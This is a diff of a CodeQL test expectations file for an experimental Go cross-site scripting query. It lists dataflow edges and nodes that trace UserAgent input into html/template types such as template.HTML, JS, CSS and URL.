-| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
-| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
-| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
-| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
-| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
 | HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : string | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
-| HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
-| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
-| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
-| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
-| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
-| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
-| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
 | HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : string | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
-| HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
-| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
-| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
-| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
-| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
-| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
-| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
 | HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : string | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
-| HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
-| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
-| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
-| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
-| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
-| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
-| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
 | HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : string | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
-| HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
-| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
-| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
-| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
-| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
-| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
-| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
 | HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : string | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
-| HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
-| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
-| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
-| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
-| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
-| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
-| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
 | HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : string | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
-| HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
-| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
-| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
-| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
-| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
-| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
-| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
 | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : string | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
-| HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:74:17:74:31 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:75:38:75:44 | escaped |
-| HTMLTemplateEscapingPassthrough.go:80:10:80:24 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:81:16:81:33 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:80:10:80:24 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:83:38:83:40 | src |
 nodes
-| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
 | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | semmle.label | call to UserAgent : string |
-| HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
 | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | semmle.label | call to UserAgent : string |
-| HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
-| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
 | HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | semmle.label | call to UserAgent : string |
-| HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
-| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
-| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
-| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
-| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
-| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
-| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
 | HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | semmle.label | call to UserAgent : string |
-| HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
-| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
-| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
-| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
-| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
-| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
-| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
-| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
-| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
-| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
-| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
-| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
-| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
-| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
-| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
 | HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | semmle.label | call to UserAgent : string |
-| HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
-| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
-| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
-| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
-| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
-| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
-| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
-| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
-| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
-| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
-| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
-| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
-| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
-| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
-| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
 | HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | semmle.label | call to UserAgent : string |
-| HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
-| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
-| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
-| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
-| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
-| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
-| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
-| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
-| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
-| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
-| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
-| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
-| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
-| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
-| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
 | HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | semmle.label | call to UserAgent : string |
-| HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
-| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
-| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
-| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
-| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
-| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
-| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
-| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
-| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
-| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
-| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
-| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
-| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
-| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
-| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
 | HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | semmle.label | call to UserAgent : string |
-| HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
-| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
-| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
-| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
-| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
-| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
-| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
-| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
-| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
-| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
-| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
-| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
-| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
-| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
-| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
 | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | semmle.label | call to UserAgent : string |
-| HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | semmle.label | call to UserAgent : string |
-| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
-| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
-| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
-| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
-| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
-| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
-| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
 | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
 | HTMLTemplateEscapingPassthrough.go:74:17:74:31 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:75:38:75:44 | escaped | semmle.label | escaped |
 | HTMLTemplateEscapingPassthrough.go:80:10:80:24 | call to UserAgent : string | semmle.label | call to UserAgent : string |
-| HTMLTemplateEscapingPassthrough.go:80:10:80:24 | call to UserAgent : string | semmle.label | call to UserAgent : string |
-| HTMLTemplateEscapingPassthrough.go:81:16:81:33 | type conversion | semmle.label | type conversion |
 | HTMLTemplateEscapingPassthrough.go:83:38:83:40 | src | semmle.label | src |
 #select
 | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion | converted |

--- a/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.expected
+++ b/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.expected
@@ -92,6 +92,14 @@ edges
 | HTMLTemplateEscapingPassthrough.go:74:17:74:31 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:75:38:75:44 | escaped |
 | HTMLTemplateEscapingPassthrough.go:80:10:80:24 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:81:16:81:33 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:80:10:80:24 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:83:38:83:40 | src |
+| HTMLTemplateEscapingPassthrough.go:88:10:88:24 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:90:16:90:77 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:90:16:90:77 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:91:38:91:46 | converted |
+| HTMLTemplateEscapingPassthrough.go:90:16:90:77 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:91:38:91:46 | converted |
+| HTMLTemplateEscapingPassthrough.go:90:16:90:77 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:91:38:91:46 | converted |
+| HTMLTemplateEscapingPassthrough.go:90:16:90:77 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:91:38:91:46 | converted |
